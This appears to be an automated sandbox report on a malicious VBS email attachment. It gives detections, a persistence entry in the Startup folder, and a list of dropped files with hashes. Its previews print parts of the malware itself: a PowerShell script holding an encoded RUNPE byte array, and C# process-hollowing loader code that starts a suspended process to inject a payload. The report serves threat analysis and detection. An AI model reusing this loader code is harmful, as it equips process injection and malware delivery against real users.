Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Re-RFQ - PN List.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@22/28@3/4
EGA Information:	Successful, ratio: 25%
HDC Information:	Failed
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs Adjust boot time Enable AMSI Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): client.wns.windows.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, arc.msn.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
Execution Graph export aborted for target InstallUtil.exe, PID 1400 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6488 because it is empty
Execution Graph export aborted for target powershell.exe, PID 924 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:29:22	API Interceptor	1x Sleep call for process: wscript.exe modified
19:29:33	API Interceptor	190x Sleep call for process: powershell.exe modified
19:29:46	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	72380
Entropy (8bit):	4.487269333453108
Encrypted:	false
SSDEEP:	768:DG/YDiYzl8cxJiaxr4ObGjITCTmUHh8hDhpjMWA1nDtWFnXyONzp208wSuPV0fFQ:ae9x1rNKKjgD8FniON9f+aNvHKW5/D
MD5:	C95C4C5AD07F648F678ADC868D188027
SHA1:	9C66D7C88D8E72F776031AE1F7BF91ACC7008461
SHA-256:	2EC7DE458E24B557DC21200CE248E299B89E9454A919464AEB6D3833EE10E8E3
SHA-512:	F667C30ED25A9C5228D4C84B82906E571E2F2A98F9E16922BD5ED1B04C0DC9CE55C4CCFCD1C6041F6DD2445293DC48CD71820330F048FD44F6D9F34CFBB79609
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: C:\Users\Public\gia9ab2dg0.PS1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	.Add-Type -AssemblyName System.Windows.Forms..Add-Type -AssemblyName Microsoft.VisualBasic..Add-Type -AssemblyName Microsoft.CSharp..Add-Type -AssemblyName System.Management..Add-Type -AssemblyName System.Web....[Byte[]] $RUNPE = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,188,215,236,77,254,174,181,159,125,81,76,235,170,169,206,219,241,79,22,205,58,43,159,100,77,49,237,190,113,82,149,101,62,109,139,106,217,140,63,207,151,121,205,77,126,227,100,153,45,242,102,149,77,243,244,243,179,55,191,1

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, 61480 bytes, 1 file
Category:	dropped
Size (bytes):	61480
Entropy (8bit):	7.9951219482618905
Encrypted:	true
SSDEEP:	1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
MD5:	B9F21D8DB36E88831E5352BB82C438B3
SHA1:	4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
SHA-256:	998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
SHA-512:	D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
Malicious:	false
Preview:	MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4\|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D\|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......\|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU.....V.{V6..m..D.-\|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..\| .#.......I...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.1283949652847367
Encrypted:	false
SSDEEP:	6:kKrtoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:TVkPlE99SNxAhUesE1
MD5:	11D4E7F875B93256FA99070078197E64
SHA1:	CB8FB5470849A11A500F34E52BC29485B255237F
SHA-256:	8F61FBFA1D7ED127BB5F6267CCA774F6F6936D5FC8AE1FA7AB84120A30E49D9A
SHA-512:	72525F4C8A15A6D1A1B063C25855DD770B9F3134926FE960AFB5D25A3F02A29AD93D23A58BA780C0FF7FBB892190D91BB60C227AAC1BFA015A848021A68CE829
Malicious:	false
Preview:	p...... ........9...i..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.884004042663719
Encrypted:	false
SSDEEP:	192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4n2Ca6pZlb4:ySib4q4dvEib42opbjvwRjdvRnrkjh4v
MD5:	BD615E1A2BC83828E536E020BD2D7DE9
SHA1:	340AF08B8BB60B52442FFE05FF8277C4276C8320
SHA-256:	B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
SHA-512:	90EC9D0E15D0D7609963BC7E19A2DE7B1D8B068460D2A0AA666D94E84360116868D19417F5C8D87E82D917CF6BC8BFFDEA8CDC73A86CD44419FFACA1E261D0E6
Malicious:	false
Preview:	PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1664
Entropy (8bit):	5.482563553285258
Encrypted:	false
SSDEEP:	48:mTrB4nqRL/HEekFnCvO9tC43uBSfMM9lH/MRNYqrIByjwAj:mTrqnObHba4Oe43uxGlHwNn0Bydj
MD5:	5F17A93CDAD157820E394DC0F3997CF8
SHA1:	8BD19C2C6BC495B18D5D9236816FE3CE840AA5F6
SHA-256:	FBC340A69AF22A3054D02AD484F41BD943A447769DE12A1612AF370918BEC203
SHA-512:	796E07E1F8C9CD8850FA1431784FD5AAAB046A102321240215C7AF152CEF01CD6AC55F1F512D9AD9B9B07F307504A6582A1C7CC849308B0949A76630A785DFCB
Malicious:	false
Preview:	@...e...........G....................................@..........4...............b..4.@.o.....G.......System.Web..H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D...........

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15102
Entropy (8bit):	4.763851296298132
Encrypted:	false
SSDEEP:	192:d4FazHgDRO2fwldsgNA/DxRry0at6knscDiF1u74+mFXqvFuI:+Fa9ldsgNeL1at6oslF1u2avN
MD5:	5B28648A4E188B0EBDF2D5EDCDA61624
SHA1:	FAF0BA6C2EF8D8184881EDA8A276796449969E1C
SHA-256:	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
SHA-512:	972FCA6205F8927363B751FF51C6CF07C3B42F7CBD8FBE12C1098DF539118ECF3D3CE1AF3B5D376C8710ED183786FC911279FF81941ABA4202A11CA5670B9937
Malicious:	false
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;..using System.Text;..using Microsoft.VisualBasic;..using System.Collections.Generic;....namespace GIT..{.. public sealed class Repository.. {.. public static void Execute(string path, byte[] payload).. {.. for (int i = 0; i < 5; i++).. {.. int readWrite = 0x0;.. NativeMethods.StartupInformation si = new NativeMethods.StartupInformation();.. NativeMethods.ProcessInformation pi = new NativeMethods.ProcessInformation();.. si.Size = (UInt32)(Marshal.SizeOf(typeof(NativeMethods.StartupInformation))); //Attention !.... try.. {.. bool createProc = NativeMethods.CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x00000004 \| 0x08000000, IntPtr.Zero, null, ref si, ref pi);.. if (!createProc).. {..

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.0468605295995275
Encrypted:	false
SSDEEP:	6:pAu+H2L/0DjuM3RLBPWdy1MZ915N723f1k+B0zxspRu6EXbB/N723f1k+b:p37L/UukvGZ91batk+B0cY6EXbBlatks
MD5:	F8CC808956A1DBA06C132EF9B10E2903
SHA1:	06C2D7CCF2DA17AA7A7663E016447864264BB0AA
SHA-256:	4144637C604F11CC6570E6A769692B3A30BCB3745E53024DDDCDD1C21D469DDB
SHA-512:	4AEECC91A06BCC94EAF09462BBF372DFD5D71A5D8A4854323FD18D53FF346C43A5D9FF03C9CDF0B2F803F290DA6B41895B8A623A49F990FBBAFA827BED23D785
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs"

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.022390817701844
Encrypted:	false
SSDEEP:	192:ZrwrEuvXuse9L9kJfpesGCFoOQejfvdLav63lktPGgK:ZeVesgL9OfYDCKejHdL136ugK
MD5:	989E1366E27A69F74476C3498AAAE89A
SHA1:	F9B7FDE729775B0644932B615AE04B3B008FFC9B
SHA-256:	F31D2B71489BB3A7728094B0A102200A26F98CE1F2A76FCF8FDB1816D3C540F5
SHA-512:	67BD7DE4CDECDFB0D214D146DFABF97C0AB402985D363A9873C169FF58B09CF1B50B387081AB3AA188FC8B444A2CB4890A431397B2794EC9FF99227F68D8AE25
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.....&...........E... ...`....... ....................................@..................................D..W....`............................................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H.......(*...............................................................0............8.............................(....(....}....~.....r...p~....~..... ....~.........o1.......-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o........-%s....z~......{......o........-.s....z...)......~......{.......X.....o).......-.s....z....3.~......{......o-...,.s....z....PX(..........TX(.........~......{........ .0...@o!.......-.s....z~......{...........o%.......-.s

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	941
Entropy (8bit):	5.223369918239281
Encrypted:	false
SSDEEP:	24:KOuIdnUCZXathFEXb3at6KaM5DqBVKVrdFAMBJT44a:y0UCZKtbt6KxDcVKdBJc4a
MD5:	2AFA8A39A27D20C65D3D7BE409B88C5B
SHA1:	BB327D6676B22126720A52142D66CF23D114AFC2
SHA-256:	17568FC0C9A4E5B0BE645618E4C9C90B723CD07B3801BE7E913D1ACB3503D0C2
SHA-512:	030F7BB169003EE42D17AD67ED05EE537C81D61C0F5DA8025EF1099AD5C33C1C1AE009B66E1ADEC3A64493DF0C7B8A35C68DAB42514C263E0E91FA8E08D30677
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....warning CS1607: Assembly generation -- Referenced assembly 'mscorlib.dll' targets a different processor..

C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0893251409333966
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygak7YnqqWPN5Dlq5J:+RI+ycuZhNuakSWPNnqX
MD5:	D05383B7C687FC28B8F4FC0C91B2E8A5
SHA1:	397A3851B5EC340A5E60610A0EEE1F0D10FEE9CC
SHA-256:	36EE338E7C0313F85F4EF34F8687C5349D850B5B3F20943E922CBD3AD453A3C9
SHA-512:	72EF0FAC394F69D6D44EC33C6EA1875C26F094DAD949ACE55BF9487804518EC91E298B587072F841906F923452B24768CEC42D3649E44217E753184E669BDC9D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES14F3.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	4.100108086923389
Encrypted:	false
SSDEEP:	24:Hri9CaMKAxZaHrolYhK0buVMONwI+ycuZhN8qakS3bPNnq92d:gMx0LolaKYu9m1ul9a3hq9G
MD5:	ECDE385ADBB15C9C3A63910E48364F25
SHA1:	BE2542FE33E8E84732BA6EEF2B3DE109CD335E1A
SHA-256:	C7455CEF351196818401F1E8E1FAF7FA9BA118AA70A3E87284EE0DC8FB1C54F7
SHA-512:	2A979C8DC5A80D2A3E31F1D9BB3F2130194E7B4926708CC6E51922C88212D318A907423FBB77251C15E6FFA67E4974BE47CA29AC9CAB0A2AC1BA2DB7935EDA49
Malicious:	false
Preview:	L......b.............debug$S............................@..B.rsrc$01........X.......t...........@..@.rsrc$02........P...~...............@..@........V....c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP.................r\...k./2.>..~............7.......C:\Users\user\AppData\Local\Temp\RES14F3.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.v.c.h.i.0.q...

C:\Users\user\AppData\Local\Temp\RESC9E1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	3.9994034632031084
Encrypted:	false
SSDEEP:	24:HIK9oVat/SO0moyutbaHgYhKKjmNII+ycuZhNuakSWPNnq9ed:CIt/J5nRKMmu1ulua3qq9+
MD5:	6DF2142D3D29C6B02DA33122B71E2368
SHA1:	262370695120C64CE289E3E4A3DDAE10935DBA67
SHA-256:	47EC0D06A3398D519413A2BB248B88ECA2D8D4F0EB8E94DBD39A39532330C01E
SHA-512:	8201F9B42A5F705D415256F41F60F430665D9723A606C90982898E644E75E12579631BE70FAD9BFEA5DB36A5F67CEE597FEE427336A54D8F404CDF40C0127100
Malicious:	false
Preview:	L......b.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP.................S....(.................7.......C:\Users\user\AppData\Local\Temp\RESC9E1.tmp.-.<...................'...Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.093049546370272
